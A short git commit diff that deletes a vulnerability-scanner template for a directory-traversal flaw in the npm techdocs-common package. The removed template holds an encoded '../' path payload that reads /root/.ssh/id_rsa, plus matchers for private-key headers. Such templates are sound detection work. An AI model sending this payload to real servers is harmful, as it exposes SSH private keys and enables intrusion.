Delete npm-techdocs-common.yaml
parent
b521701607
commit
5e24f64007
|
@ -1,25 +0,0 @@
|
|||
id: npm-techdocs-common
|
||||
|
||||
info:
|
||||
name: NPM - techdocs-common - Directory Traversal
|
||||
author: dhiyaneshDk
|
||||
severity: high
|
||||
tags: config,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "BEGIN OPENSSH PRIVATE KEY"
|
||||
- "BEGIN PRIVATE KEY"
|
||||
- "BEGIN RSA PRIVATE KEY"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue